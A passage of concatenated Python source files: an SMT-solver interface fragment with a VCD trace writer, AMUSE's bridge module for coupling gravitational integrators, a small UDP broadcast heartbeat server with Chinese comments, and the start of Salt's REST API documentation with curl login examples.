if net_path[-1] not in self.modinfo[mod].wsize: return False
return True
def mem_exists(self, mod, mem_path):
for i in range(len(mem_path)-1):
if mod not in self.modinfo: return False
if mem_path[i] not in self.modinfo[mod].cells: return False
mod = self.modinfo[mod].cells[mem_path[i]]
if mod not in self.modinfo: return False
if mem_path[-1] not in self.modinfo[mod].memories: return False
return True
def mem_expr(self, mod, base, path, port=None, infomode=False):
if len(path) == 1:
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].memories
if infomode:
return self.modinfo[mod].memories[path[0]]
return "(|%s_m%s %s| %s)" % (mod, "" if port is None else ":%s" % port, path[0], base)
assert mod in self.modinfo
assert path[0] in self.modinfo[mod].cells
nextmod = self.modinfo[mod].cells[path[0]]
nextbase = "(|%s_h %s| %s)" % (mod, path[0], base)
return self.mem_expr(nextmod, nextbase, path[1:], port=port, infomode=infomode)
def mem_info(self, mod, path):
return self.mem_expr(mod, "", path, infomode=True)
def get_net(self, mod_name, net_path, state_name):
return self.get(self.net_expr(mod_name, state_name, net_path))
def get_net_list(self, mod_name, net_path_list, state_name):
return self.get_list([self.net_expr(mod_name, state_name, n) for n in net_path_list])
def get_net_hex(self, mod_name, net_path, state_name):
return self.bv2hex(self.get_net(mod_name, net_path, state_name))
def get_net_hex_list(self, mod_name, net_path_list, state_name):
return [self.bv2hex(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def get_net_bin(self, mod_name, net_path, state_name):
return self.bv2bin(self.get_net(mod_name, net_path, state_name))
def get_net_bin_list(self, mod_name, net_path_list, state_name):
return [self.bv2bin(v) for v in self.get_net_list(mod_name, net_path_list, state_name)]
def wait(self):
if self.p is not None:
self.p.wait()
self.p_close()
class SmtOpts:
def __init__(self):
self.shortopts = "s:S:v"
self.longopts = ["unroll", "noincr", "noprogress", "dump-smt2=", "logic=", "dummy=", "info=", "nocomments"]
self.solver = "yices"
self.solver_opts = list()
self.debug_print = False
self.debug_file = None
self.dummy_file = None
self.unroll = False
self.noincr = False
self.timeinfo = os.name != "nt"
self.logic = None
self.info_stmts = list()
self.nocomments = False
def handle(self, o, a):
if o == "-s":
self.solver = a
elif o == "-S":
self.solver_opts.append(a)
elif o == "-v":
self.debug_print = True
elif o == "--unroll":
self.unroll = True
elif o == "--noincr":
self.noincr = True
elif o == "--noprogress":
self.timeinfo = False
elif o == "--dump-smt2":
self.debug_file = open(a, "w")
elif o == "--logic":
self.logic = a
elif o == "--dummy":
self.dummy_file = a
elif o == "--info":
self.info_stmts.append(a)
elif o == "--nocomments":
self.nocomments = True
else:
return False
return True
def helpmsg(self):
return """
-s <solver>
set SMT solver: z3, yices, boolector, cvc4, mathsat, dummy
default: yices
-S <opt>
pass <opt> as command line argument to the solver
--logic <smt2_logic>
use the specified SMT2 logic (e.g. QF_AUFBV)
--dummy <filename>
if solver is "dummy", read solver output from that file
otherwise: write solver output to that file
-v
enable debug output
--unroll
unroll uninterpreted functions
--noincr
don't use incremental solving, instead restart solver for
each (check-sat). This also avoids (push) and (pop).
--noprogress
disable timer display during solving
(this option is set implicitly on Windows)
--dump-smt2 <filename>
write smt2 statements to file
--info <smt2-info-stmt>
include the specified smt2 info statement in the smt2 output
--nocomments
strip all comments from the generated smt2 code
"""
class MkVcd:
def __init__(self, f):
self.f = f
self.t = -1
self.nets = dict()
self.clocks = dict()
def add_net(self, path, width):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, width)
def add_clock(self, path, edge):
path = tuple(path)
assert self.t == -1
key = "n%d" % len(self.nets)
self.nets[path] = (key, 1)
self.clocks[path] = (key, edge)
def set_net(self, path, bits):
path = tuple(path)
assert self.t >= 0
assert path in self.nets
if path not in self.clocks:
print("b%s %s" % (bits, self.nets[path][0]), file=self.f)
def escape_name(self, name):
name = re.sub(r"\[([0-9a-zA-Z_]*[a-zA-Z_][0-9a-zA-Z_]*)\]", r"<\1>", name)
if re.match("[\[\]]", name) and name[0] != "\\":
name = "\\" + name
return name
def set_time(self, t):
assert t >= self.t
if t != self.t:
if self.t == -1:
print("$var integer 32 t smt_step $end", file=self.f)
print("$var event 1 ! smt_clock $end", file=self.f)
scope = []
for path in sorted(self.nets):
key, width = self.nets[path]
uipath = list(path)
if "." in uipath[-1]:
uipath = uipath[0:-1] + uipath[-1].split(".")
for i in range(len(uipath)):
uipath[i] = re.sub(r"\[([^\]]*)\]", r"<\1>", uipath[i])
while uipath[:len(scope)] != scope:
print("$upscope $end", file=self.f)
scope = scope[:-1]
while uipath[:-1] != scope:
print("$scope module %s $end" % uipath[len(scope)], file=self.f)
scope.append(uipath[len(scope)])
if path in self.clocks and self.clocks[path][1] == "event":
print("$var event 1 %s %s $end" % (key, uipath[-1]), file=self.f)
else:
print("$var wire %d %s %s $end" % (width, key, uipath[-1]), file=self.f)
for i in range(len(scope)):
print("$upscope $end", file=self.f)
print("$enddefinitions $end", file=self.f)
self.t = t
assert self.t >= 0
if self.t > 0:
print("#%d" % (10 * self.t - 5), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "posedge":
print("b0 %s" % self.nets[path][0], file=self.f)
elif self.clocks[path][1] == "negedge":
print("b1 %s" % self.nets[path][0], file=self.f)
print("#%d" % (10 * self.t), file=self.f)
print("1!", file=self.f)
print("b%s t" % format(self.t, "032b"), file=self.f)
for path in sorted(self.clocks.keys()):
if self.clocks[path][1] == "negedge":
print("b0 %s" % self.nets[path][0], file=self.f)
else:
print("b1 %s" % self.nets[path][0], file=self.f)
|
bridge.py
|
"""
bridge-like integrator for amuse
the bridge class provides a bridge like coupling between different
gravitational integrators. In this way a system composed of multiple
components can be evolved taking account of the self gravity of the whole
system self consistently, while choosing the most appropiate integrator
for the self-gravity of the component systems. This is mainly useful for
systems consist of two or more components that are either well separated
spatially or have different scales (otherwise using a single integrator is
more efficient)
The main idea is that systems experience each others gravity through
periodic velocty kicks with ordinary evolution in between - the evolution
is thus described by an alternation of drift (D) and kick (K) operators,
here chosen as:
K(1/2 dt) D(dt) K(1/2 dt)
K(dt) denotes a kick of the velocities over a timestep dt, while D(dt)
denotes a drift, meaning secular evolution using self gravity of the
system, over dt.
implementation notes:
In order to use bridge the component systems should be initialized as usual,
then a bridge systems is initialized, after which one or more systems are
added:
from amuse.ext.bridge import bridge
bridgesys=bridge(verbose=False)
bridgesys.add_system(galaxy, (cluster,), False)
bridgesys.add_system(cluster, (galaxy,), True )
bridge builds on the full gravity interface, so unit handling etc is
guaranteed. Bridge itself is a (somewhat incomplete) gravity interface,
so the usual evolve, get_potential methods work (and bridge can be a
component in a bridge systems). Note that a single coordinate system should
be used at the moment for all the components systems (different units are
allowed though). The call to add systems, for example:
bridgesys.add_system(galaxy, (cluster,), False)
has three arguments: the system, a set with *interaction* partners and
a flag to specify whether synchronization is needed . The
interaction partners indicate which systems will kick the system. In the
most simple case these would be the set of other systems that are added,
but usually this is not what you want to get good performace. In some
cases you want to ignore one direction of interaction (eg. in a combined
simulation of a galaxy and a comet orbits around a star you may want the
ignore the gravity of the comet), in other cases you want to use a
different force calculator (eg integrating a cluster in a galaxy where
the galaxy is evolved with a tree code and the cluster with a direct sum
code, one also would want to use a tree code to calculate the cluster
gravity for the galaxy. In such a case one can derive a skeleton gravity
interface from the cluster system. A module is provided with some
examples of such *derived* systems, derived_grav_systems.py
Hints for good use:
The bridgesys is flexible but care should be taken in order to obtain
valid results. For one thing, there is no restriction or check on the
validity of the assumption of well seperated dynamics: for example any
system could be split up and put together in bridge, but if the timestep
is chosen to be larger than the timestep criterion of the code, the
integration will show errors.
For good performance one should use derived systems to reduce the
complexity where possible.
There is an issue with the synchronization: some codes do not end on the
exact time of an evolve, or need an explicit sync call. In these cases it
is up to the user to determine whether bridge can be used (an explicit
sync call may induce extra errors that degrade the order of the
integrator).
"""
# issues:
# - for now, units in si
# - a common coordinate system is used for all systems
# - sync of systems should be checked
# - timestepping: adaptive dt?
import threading
from amuse.units import quantities
from amuse.units import units, constants, generic_unit_system, nbody_system
from amuse import datamodel
from amuse.support.exceptions import AmuseException
class AbstractCalculateFieldForCodes(object):
"""
Calculated gravity and potential fields using the particles
of other codes with the code provided.
"""
def __init__(self, input_codes, verbose=False, required_attributes=None):
"""
'verbose' indicates whether to output some run info
'required_attributes' specifies which particle attributes need to be
transferred from the input_codes to the code that will calculate the
field. For example, some codes don't need the velocity. Other codes
may (wrongly) interpret the radius of the input code as gravitational
softening. In the latter case
required_attributes=['mass', 'x','y','z', 'vx','vy','vz']
should prevent the radius of the input codes from being used.
"""
self.codes_to_calculate_field_for = input_codes
self.verbose=verbose
if required_attributes is None:
self.required_attributes = lambda p, attribute_name: True
else:
self.required_attributes = lambda p, attribute_name: attribute_name in required_attributes
def evolve_model(self,tend,timestep=None):
"""
"""
def get_potential_at_point(self,radius,x,y,z):
code = self._setup_code()
try:
for input_code in self.codes_to_calculate_field_for:
particles = input_code.particles.copy(filter_attributes = self.required_attributes)
code.particles.add_particles(particles)
code.commit_particles()
return code.get_potential_at_point(radius,x,y,z)
finally:
self._cleanup_code(code)
def get_gravity_at_point(self,radius,x,y,z):
code = self._setup_code()
try:
for input_code in self.codes_to_calculate_field_for:
particles = input_code.particles.copy(filter_attributes = self.required_attributes)
code.particles.add_particles(particles)
code.commit_particles()
return code.get_gravity_at_point(radius,x,y,z)
finally:
self._cleanup_code(code)
def _setup_code(self):
pass
def _cleanup_code(self, code):
pass
class CalculateFieldForCodes(AbstractCalculateFieldForCodes):
"""
Calculated gravity and potential fields using the particles
of other codes with the code provided.
The code is created for every calculation.
"""
def __init__(self, code_factory_function, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code_factory_function = code_factory_function
def _setup_code(self):
return self.code_factory_function()
def _cleanup_code(self, code):
code.stop()
class CalculateFieldForCodesUsingReinitialize(AbstractCalculateFieldForCodes):
"""
Calculated gravity and potential fields using the particles
of other codes with the code provided.
The code is created for every calculation.
"""
def __init__(self, code, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code = code
def _setup_code(self):
return self.code
def _cleanup_code(self, code):
code.reset()
class CalculateFieldForCodesUsingRemove(AbstractCalculateFieldForCodes):
"""
Calculated gravity and potential fields using the particles
of other codes with the code provided.
The code is created for every calculation.
"""
def __init__(self, code, input_codes, *args, **kwargs):
AbstractCalculateFieldForCodes.__init__(self, input_codes, *args, **kwargs)
self.code = code
def _setup_code(self):
return self.code
def _cleanup_code(self, code):
code.particles.remove_particles(code.particles)
class CalculateFieldForParticles(object):
"""
Calculates an field for a set of particles, the set
of particles can be from another code.
"""
def __init__(self, particles = None, gravity_constant = None,
softening_mode="shared", G = None):
if particles is None:
self.particles=datamodel.Particles()
else:
self.particles = particles
if gravity_constant is None:
gravity_constant = G
elif not G is None:
raise Exception("both the parameter 'gravity_constant'({0}) and the parameter 'G'({1}) are given, please specify only one!".format(gravity_constant, G))
if gravity_constant is None:
if len(particles) and hasattr(particles, 'mass'):
try:
particles[0].mass.value_in(units.kg)
self.gravity_constant = constants.G
except:
raise AmuseException("For generic units the gravity_constant must be specified")
else:
raise AmuseException("Particle data not yet available, so the gravity_constant must be specified")
else:
self.gravity_constant = gravity_constant
if softening_mode == "individual" or softening_mode == "radius":
self._softening_lengths_squared = self._softening_lengths_squared_individual
elif softening_mode == "h_smooth":
self._softening_lengths_squared = self._softening_lengths_squared_h_smooth
else:
self._softening_lengths_squared = self._softening_lengths_squared_shared
self.smoothing_length_squared = quantities.zero
def _softening_lengths_squared_individual(self):
return self.particles.radius**2
def _softening_lengths_squared_h_smooth(self):
return self.particles.h_smooth**2
def _softening_lengths_squared_shared(self):
return self.smoothing_length_squared#.as_vector_with_length(len(self.particles))
def cleanup_code(self):
self.particles = datamodel.Particles()
def evolve_model(self,tend,timestep=None):
"""
"""
def get_potential_at_point(self,radius,x,y,z):
positions = self.particles.position
result = quantities.AdaptingVectorQuantity()
for i in range(len(x)):
dx = x[i] - positions.x
dy = y[i] - positions.y
dz = z[i] - positions.z
dr_squared = (dx * dx) + (dy * dy) + (dz * dz)
dr = (dr_squared + self._softening_lengths_squared()).sqrt()
energy_of_this_particle = (self.particles.mass / dr).sum()
result.append(-self.gravity_constant * energy_of_this_particle)
return result
def get_gravity_at_point(self,radius,x,y,z):
positions = self.particles.position
m1 = self.particles.mass
result_ax = quantities.AdaptingVectorQuantity()
result_ay = quantities.AdaptingVectorQuantity()
result_az = quantities.AdaptingVectorQuantity()
for i in range(len(x)):
dx = x[i] - positions.x
dy = y[i] - positions.y
dz = z[i] - positions.z
dr_squared = ((dx * dx) + (dy * dy) + (dz * dz) +
self._softening_lengths_squared() + radius[i]**2)
ax = -self.gravity_constant * (m1*dx/dr_squared**1.5).sum()
ay = -self.gravity_constant * (m1*dy/dr_squared**1.5).sum()
az = -self.gravity_constant * (m1*dz/dr_squared**1.5).sum()
result_ax.append(ax)
result_ay.append(ay)
result_az.append(az)
return result_ax, result_ay, result_az
class GravityCodeInField(object):
def __init__(self, code, field_codes, do_sync=True, verbose=False, radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False, use_velocity=False):
"""
verbose indicates whether to output some run info
"""
self.code = code
self.field_codes = field_codes
if hasattr(self.code, 'model_time'):
self.time = self.code.model_time
else:
self.time = quantities.zero
self.do_sync=do_sync
self.verbose=verbose
self.timestep=None
self.radius_is_eps = radius_is_eps
self.h_smooth_is_eps = h_smooth_is_eps
required_attributes = ['mass', 'x', 'y', 'z', 'vx', 'vy', 'vz']
if self.radius_is_eps:
required_attributes.append('radius')
elif self.h_smooth_is_eps:
required_attributes.append('h_smooth')
self.required_attributes = lambda p, x : x in required_attributes
if not hasattr(self.code,"parameters"):
self.zero_smoothing=True
elif not hasattr(self.code.parameters,"epsilon_squared"):
self.zero_smoothing=True
else:
self.zero_smoothing=zero_smoothing
self.use_velocity=use_velocity
def evolve_model(self,tend,timestep=None):
"""
evolve combined system to tend, timestep fixes timestep
"""
if timestep is None:
timestep = self.timestep
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick(timestep/2.)
first=False
else:
self.kick(timestep)
self.drift(self.time+timestep)
self.time+=timestep
if not first:
self.kick(timestep/2.)
def synchronize_model(self):
"""
explicitly synchronize all components
"""
if hasattr(self.code,"synchronize_model"):
if(self.verbose):
print(self.code.__class__.__name__,"is synchronizing", end=' ')
self.code.synchronize_model()
if(self.verbose):
print(".. done")
def get_potential_at_point(self,radius,x,y,z):
return self.code.get_potential_at_point(radius,x,y,z)
def get_gravity_at_point(self,radius,x,y,z):
return self.code.get_gravity_at_point(radius,x,y,z)
@property
def model_time(self):
return self.time
@property
def potential_energy(self):
if not hasattr(self.code, 'particles'):
return quantities.zero
result = self.code.potential_energy
particles = self.code.particles.copy(filter_attributes = self.required_attributes)
for y in self.field_codes:
energy = self.get_potential_energy_in_field_code(particles, y)
result += energy
return result
@property
def kinetic_energy(self):
return self.code.kinetic_energy
@property
def thermal_energy(self):
if hasattr(self.code,'thermal_energy'):
return self.code.thermal_energy
else:
return quantities.zero
@property
def particles(self):
return self.code.particles
@property
def gas_particles(self):
if hasattr(self.code, "gas_particles"):
return self.code.gas_particles
else:
raise AttributeError
@property
def dm_particles(self):
if hasattr(self.code, "dm_particles"):
return self.code.dm_particles
else:
raise AttributeError
def drift(self, tend):
if not hasattr(self.code,"evolve_model"):
return
if (self.verbose):
print(self.code.__class__.__name__, "is evolving to", tend)
self.code.evolve_model(tend)
if(self.verbose):
print(".. done")
def cannot_kick(self):
"""
check if the code is capable of kicking other particles,
please do not try to optimize this, I know it is called every kick but
only calculating it at the start causes an annoying bug in certain uses of the code.
"""
return len(self.code.particles)==0 or not (hasattr(self, 'particles') and 'vx' in self.particles.get_attribute_names_defined_in_store())
def kick(self, dt):
if self.cannot_kick():
return quantities.zero
particles = self.code.particles.copy(filter_attributes = self.required_attributes)
kinetic_energy_before = particles.kinetic_energy()
for field_code in self.field_codes:
if(self.verbose):
print(self.code.__class__.__name__,"receives kick from",field_code.__class__.__name__, end=' ')
self.kick_with_field_code(
particles,
field_code,
dt
)
if(self.verbose):
print(".. done")
channel=particles.new_channel_to(self.code.particles)
channel.copy_attributes(["vx","vy","vz"])
kinetic_energy_after = particles.kinetic_energy()
return kinetic_energy_after - kinetic_energy_before
def _softening_lengths(self, particles):
if self.radius_is_eps:
return particles.radius
elif self.h_smooth_is_eps:
return particles.h_smooth
elif self.zero_smoothing:
return 0.*particles.x
else:
return (self.code.parameters.epsilon_squared**0.5).as_vector_with_length(len(particles))
def get_potential_energy_in_field_code(self, particles, field_code):
pot=field_code.get_potential_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z
)
return (pot*particles.mass).sum() / 2
def kick_with_field_code(self, particles, field_code, dt):
if self.use_velocity:
ax,ay,az=field_code.get_gravity_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z,
particles.vx,
particles.vy,
particles.vz
)
else:
ax,ay,az=field_code.get_gravity_at_point(
self._softening_lengths(particles),
particles.x,
particles.y,
particles.z
)
self.update_velocities(particles, dt, ax, ay, az)
def update_velocities(self,particles, dt, ax, ay, az):
particles.vx += dt * ax
particles.vy += dt * ay
particles.vz += dt * az
def stop(self):
self.code.stop()
class Bridge(object):
def __init__(self, timestep = None, verbose=False, use_threading=True,method=None):
"""
verbose indicates whether to output some run info
"""
self.codes=[]
self.time=quantities.zero
self.verbose=verbose
self.timestep=timestep
self.kick_energy = quantities.zero
self.use_threading = use_threading
self.time_offsets = dict()
self.method=method
self.channels = datamodel.Channels()
def add_system(self, interface, partners=set(), do_sync=True,
radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False):
"""
add a system to bridge integrator
"""
if hasattr(interface, "particles"):
code = GravityCodeInField(interface, partners, do_sync, self.verbose,
radius_is_eps, h_smooth_is_eps, zero_smoothing)
self.add_code(code)
else:
if len(partners):
raise Exception("You added a code without particles, but with partners, this is not supported!")
self.add_code(interface)
def add_code(self, code):
self.codes.append(code)
if hasattr(code,"model_time"):
self.time_offsets[code]=(self.time-code.model_time)
else:
self.time_offsets[code]=quantities.zero
def evolve_model(self, tend, timestep=None):
"""
evolve combined system to tend, timestep fixes timestep
"""
if timestep is None:
if self.timestep is None:
timestep=tend-self.time
else:
timestep = self.timestep
if self.method is None:
return self.evolve_joined_leapfrog(tend,timestep)
else:
return self.evolve_simple_steps(tend,timestep)
def evolve_simple_steps(self,tend,timestep):
while self.time < (tend-timestep/2):
self._drift_time=self.time
self.method(self.kick_codes,self.drift_codes_dt, timestep)
self.channels.copy()
self.time=self.time+timestep
def evolve_joined_leapfrog(self,tend,timestep):
first=True
while self.time < (tend-timestep/2.):
if first:
self.kick_codes(timestep/2.)
first=False
else:
self.kick_codes(timestep)
self.drift_codes(self.time+timestep)
self.channels.copy()
self.time += timestep
if not first:
self.kick_codes(timestep/2.)
def synchronize_model(self):
"""
explicitly synchronize all components
"""
for x in self.codes:
if hasattr(x,"synchronize_model"):
if(self.verbose): print(x.__class__.__name__,"is synchronizing", end=' ')
x.synchronize_model()
if(self.verbose): print(".. done")
def stop(self):
for one_code in self.codes:
if hasattr(one_code, "stop"):
one_code.stop()
def get_potential_at_point(self,radius,x,y,z):
pot=quantities.zero
for code in self.codes:
_pot=code.get_potential_at_point(radius,x,y,z)
pot=pot+_pot
return pot
def get_gravity_at_point(self,radius,x,y,z):
ax=quantities.zero
ay=quantities.zero
az=quantities.zero
for code in self.codes:
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z)
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az
@property
def model_time(self):
return self.time
@property
def potential_energy(self):
result=quantities.zero
for x in self.codes:
result+=x.potential_energy
return result
@property
def kinetic_energy(self):
result=quantities.zero
for x in self.codes:
result+=x.kinetic_energy
return result #- self.kick_energy
@property
def thermal_energy(self):
result=quantities.zero
for x in self.codes:
if hasattr(x,'thermal_energy'):
result+=x.thermal_energy
return result
@property
def particles(self):
array=[]
for x in self.codes:
if hasattr(x,"particles"):
array.append(x.particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
@property
def gas_particles(self):
array=[]
for x in self.codes:
if hasattr(x,"gas_particles"):
array.append(x.gas_particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
@property
def dm_particles(self):
array=[]
for x in self.codes:
if hasattr(x,"dm_particles"):
array.append(x.dm_particles)
elif hasattr(x,"particles"):
array.append(x.particles)
if len(array) == 0:
raise AttributeError
elif len(array) == 1:
return array[0]
return datamodel.ParticlesSuperset(array)
# 'private' functions
def drift_codes_dt(self,dt):
self._drift_time+=dt
self.drift_codes(self._drift_time)
def drift_codes(self,tend):
threads=[]
for x in self.codes:
offset=self.time_offsets[x]
if hasattr(x,"drift"):
threads.append(threading.Thread(target=x.drift, args=(tend-offset,)) )
elif hasattr(x,"evolve_model"):
threads.append(threading.Thread(target=x.evolve_model, args=(tend-offset,)) )
if self.use_threading:
for x in threads:
x.start()
for x in threads:
x.join()
else:
for x in threads:
x.run()
def kick_codes(self,dt):
de = quantities.zero
for x in self.codes:
if hasattr(x,"kick"):
de += x.kick(dt)
self.kick_energy += de
class VelocityDependentBridge(Bridge):
def __init__(self, timestep=None, verbose=False, use_threading=True, method=None):
"""
verbose indicates whether to output some run info
"""
self.codes=[]
self.use_velocity=[]
self.time=quantities.zero
self.verbose=verbose
self.timestep=timestep
self.kick_energy = quantities.zero
self.use_threading = use_threading
self.time_offsets = dict()
self.method=method
self.channels = datamodel.Channels()
def add_system(self, interface, partners=set(), do_sync=True,
radius_is_eps=False, h_smooth_is_eps=False, zero_smoothing=False,use_velocity=False):
"""
add a system to bridge integrator
"""
if hasattr(interface, "particles"):
code = GravityCodeInField(interface, partners, do_sync, self.verbose,
radius_is_eps, h_smooth_is_eps, zero_smoothing, use_velocity)
self.add_code(code)
else:
if len(partners):
raise Exception("You added a code without particles, but with partners, this is not supported!")
self.add_code(interface)
self.use_velocity.append(use_velocity)
def get_gravity_at_point(self,radius,x,y,z,**kwargs):
ax=quantities.zero
ay=quantities.zero
az=quantities.zero
for i,code in enumerate(self.codes):
if self.use_velocity[i]:
vx,vy,vz=kwargs.get('vx'),kwargs.get('vy'),kwargs.get('vz')
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z,vx=vx,vy=vy,vz=vz)
else:
_ax,_ay,_az=code.get_gravity_at_point(radius,x,y,z)
ax=ax+_ax
ay=ay+_ay
az=az+_az
return ax,ay,az
|
UDP_Broadcast_server.py
|
import socket
import time
import json
import threading
Thread_Flag=1 #死锁计时进程
qian_Flag=0 #五次签到统计一次成员个数,五次签到一次都算
New_table=[] #新的成员列表,签到的就放里面
def sever():
global Thread_Flag,qian_Flag,New_table
HOST = '<broadcast>'
#HOST = "192.168.31.255"
ADDR = (HOST, 8884)
s = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
#设置可以广播
s.setsockopt(socket.SOL_SOCKET, socket.SO_BROADCAST, 1)
s.bind(("192.168.0.105", 8884))
#列表保存所有的客户
cli_list = []
while True:
if Thread_Flag:
Thread_Flag=0
t=threading.Thread(target=thread_func,args=(s,cli_list,ADDR))
t.start()
info = {}
#接收数据
data, addr = s.recvfrom(1024)
#屏蔽服务端接收到自己的数据
if addr[0] == "192.168.0.105":
continue
data=data.decode()
print(qian_Flag)
if qian_Flag>=5: #可能掉包无法更新,开始更新在线数
print("开始更新成员")
qian_Flag=0
cli_list=New_table
info["type"]="updata"
info["data"]=cli_list
New_table=[]
s.sendto(bytes(json.dumps(info), encoding="utf8"),ADDR) #更新列表给各个客户端
continue
if data=="1": #如果接受心跳包
if addr not in New_table: #检测是不是新成员
New_table.append(addr)
print("收到心跳包")
continue
if addr in cli_list: #老的客户端
print("老客户端:", addr, data)
info['type'] = "data"
else:
#将新的客户端添加的cli_list
cli_list.append(addr)
print("新的客户端:", addr, data)
info['type'] = "member"
info['addr'] = addr
info['data'] = data
#广播数据 json.dumps(info):将字典转换成字符串
s.sendto(bytes(json.dumps(info), encoding="utf8"),ADDR)
time.sleep(1)
def thread_func(s,cli_list,ADDR): #心跳检测
global qian_Flag
info="签到"
while True:
time.sleep(5) #睡五秒进行一次签到消息发送
s.sendto(bytes(info, encoding="utf8"),ADDR) #发签到消息
qian_Flag=qian_Flag+1 #每次签到次数加1,五次更新
#time.sleep(5)
if __name__ == '__main__':
sever()
|
app.py
|
# encoding: utf-8
'''
A REST API for Salt
===================
.. py:currentmodule:: salt.netapi.rest_cherrypy.app
.. note::
This module is Experimental on Windows platforms, and supports limited
configurations:
- doesn't support PAM authentication (i.e. external_auth: auto)
- doesn't support SSL (i.e. disable_ssl: True)
:depends:
- CherryPy Python module.
Note: there is a `known SSL traceback for CherryPy versions 3.2.5 through
3.7.x <https://github.com/cherrypy/cherrypy/issues/1298>`_. Please use
version 3.2.3 or the latest 10.x version instead.
:optdepends: - ws4py Python module for websockets support.
:client_libraries:
- Java: https://github.com/SUSE/salt-netapi-client
- Python: https://github.com/saltstack/pepper
:setup:
All steps below are performed on the machine running the Salt Master
daemon. Configuration goes into the Master configuration file.
1. Install ``salt-api``. (This step varies between OS and Linux distros.
Some package systems have a split package, others include salt-api in
the main Salt package. Ensure the ``salt-api --version`` output matches
the ``salt --version`` output.)
2. Install CherryPy. (Read the version caveat in the section above.)
3. Optional: generate self-signed SSL certificates.
Using a secure HTTPS connection is strongly recommended since Salt
eauth authentication credentials will be sent over the wire.
1. Install the PyOpenSSL package.
2. Generate a self-signed certificate using the
:py:func:`~salt.modules.tls.create_self_signed_cert` execution
function.
.. code-block:: bash
salt-call --local tls.create_self_signed_cert
4. Edit the master config to create at least one external auth user or
group following the :ref:`full external auth instructions <acl-eauth>`.
5. Edit the master config with the following production-ready example to
enable the ``rest_cherrypy`` module. (Adjust cert paths as needed, or
disable SSL (not recommended!).)
.. code-block:: yaml
rest_cherrypy:
port: 8000
ssl_crt: /etc/pki/tls/certs/localhost.crt
ssl_key: /etc/pki/tls/certs/localhost.key
6. Restart the ``salt-master`` daemon.
7. Start the ``salt-api`` daemon.
:configuration:
All available configuration options are detailed below. These settings
configure the CherryPy HTTP server and do not apply when using an external
server such as Apache or Nginx.
port
**Required**
The port for the webserver to listen on.
host : ``0.0.0.0``
The socket interface for the HTTP server to listen on.
debug : ``False``
Starts the web server in development mode. It will reload itself when
the underlying code is changed and will output more debugging info.
log.access_file
Path to a file to write HTTP access logs.
.. versionadded:: 2016.11.0
log.error_file
Path to a file to write HTTP error logs.
.. versionadded:: 2016.11.0
ssl_crt
The path to a SSL certificate. (See below)
ssl_key
The path to the private key for your SSL certificate. (See below)
ssl_chain
(Optional when using PyOpenSSL) the certificate chain to pass to
``Context.load_verify_locations``.
disable_ssl
A flag to disable SSL. Warning: your Salt authentication credentials
will be sent in the clear!
webhook_disable_auth : False
The :py:class:`Webhook` URL requires authentication by default but
external services cannot always be configured to send authentication.
See the Webhook documentation for suggestions on securing this
interface.
webhook_url : /hook
Configure the URL endpoint for the :py:class:`Webhook` entry point.
thread_pool : ``100``
The number of worker threads to start up in the pool.
socket_queue_size : ``30``
Specify the maximum number of HTTP connections to queue.
expire_responses : True
Whether to check for and kill HTTP responses that have exceeded the
default timeout.
.. deprecated:: 2016.11.9,2017.7.3,2018.3.0
The "expire_responses" configuration setting, which corresponds
to the ``timeout_monitor`` setting in CherryPy, is no longer
supported in CherryPy versions >= 12.0.0.
max_request_body_size : ``1048576``
Maximum size for the HTTP request body.
collect_stats : False
Collect and report statistics about the CherryPy server
Reports are available via the :py:class:`Stats` URL.
stats_disable_auth : False
Do not require authentication to access the ``/stats`` endpoint.
.. versionadded:: 2018.3.0
static
A filesystem path to static HTML/JavaScript/CSS/image assets.
static_path : ``/static``
The URL prefix to use when serving static assets out of the directory
specified in the ``static`` setting.
enable_sessions : ``True``
Enable or disable all endpoints that rely on session cookies. This can
be useful to enforce only header-based authentication.
.. versionadded:: 2017.7.0
app : ``index.html``
A filesystem path to an HTML file that will be served as a static file.
This is useful for bootstrapping a single-page JavaScript app.
Warning! If you set this option to a custom web application, anything
that uses cookie-based authentication is vulnerable to XSRF attacks.
Send the custom ``X-Auth-Token`` header instead and consider disabling
the ``enable_sessions`` setting.
.. versionchanged:: 2017.7.0
Add a proof-of-concept JavaScript single-page app.
app_path : ``/app``
The URL prefix to use for serving the HTML file specified in the ``app``
setting. This should be a simple name containing no slashes.
Any path information after the specified path is ignored; this is
useful for apps that utilize the HTML5 history API.
root_prefix : ``/``
A URL path to the main entry point for the application. This is useful
for serving multiple applications from the same URL.
.. _rest_cherrypy-auth:
Authentication
--------------
Authentication is performed by passing a session token with each request.
Tokens are generated via the :py:class:`Login` URL.
The token may be sent in one of two ways: as a custom header or as a session
cookie. The latter is far more convenient for clients that support cookies.
* Include a custom header named :mailheader:`X-Auth-Token`.
For example, using curl:
.. code-block:: bash
curl -sSk https://localhost:8000/login \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
-d eauth=pam
Copy the ``token`` value from the output and include it in subsequent requests:
.. code-block:: bash
curl -sSk https://localhost:8000 \\
-H 'Accept: application/x-yaml' \\
-H 'X-Auth-Token: 697adbdc8fe971d09ae4c2a3add7248859c87079'\\
-d client=local \\
-d tgt='*' \\
-d fun=test.ping
* Sent via a cookie. This option is a convenience for HTTP clients that
automatically handle cookie support (such as browsers).
For example, using curl:
.. code-block:: bash
# Write the cookie file:
curl -sSk https://localhost:8000/login \\
-c ~/cookies.txt \\
-H 'Accept: application/x-yaml' \\
-d username=saltdev \\
-d password=saltdev \\
